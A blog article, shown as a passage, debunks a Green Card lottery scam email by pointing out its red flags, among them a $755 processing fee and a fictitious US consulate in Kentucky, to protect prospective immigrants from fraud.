    This is probably the only true item in this scam-mail. The scammers have access to a database of 6.3 million addresses harvested by various means. In my case, the address used is one I have posted in a very conspicuous place on one of the most popular community web sites on the Internet; any mail to that address is almost certainly spam or a scam, and I redirect it to GMail to cope with the volume of junk. It is highly unlikely that the US Government selects Green Card holders by drawing random e-mail addresses.

  • “Processing Fee. $755USD”

    Forgetting that the proper designation of USD currency amounts is "USD$755", this is the profit part of the scam. To obtain this "free" Green Card you've "won", just submit a nominal fee of "USD$755" to ensure careful processing. I assume the fee ensures "accuracy processing" on the same scale as the professionally produced email notification we are now reading. Perhaps we should send an extra amount to improve the "accuracy processing."

  • Since when is there a US Consulate in Kentucky?
  • “10 Great Gift Ideas – Take a Look!”

    How helpful! A free Green Card for USD$755, a free airline ticket to the US, and helpful shopping hints from Mail.com, the free email service used by the US Government to notify me of winning the Green Card lottery!

These confidence games via email are ridiculous. Unfortunately, they WORK. I know people are confused when they receive these scam-mailings. My previous article on a scam-mail, The Catholic Church (Italy) is giving out donations!, is by far the most requested page on my site. I put this article up as a service to people hoping to come to the US legally, so that if they find this page they can be spared the loss of USD$755 (and worse!).
